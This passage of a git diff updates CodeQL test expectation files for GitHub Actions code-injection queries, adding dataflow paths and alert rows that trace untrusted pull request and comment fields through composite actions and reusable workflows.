| Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 818b106b6d77..749d05244153 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -387,10 +435,15 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | @@ -411,6 +464,9 @@ subpaths | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 75b64cea3e59..3ad4e6915d23 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 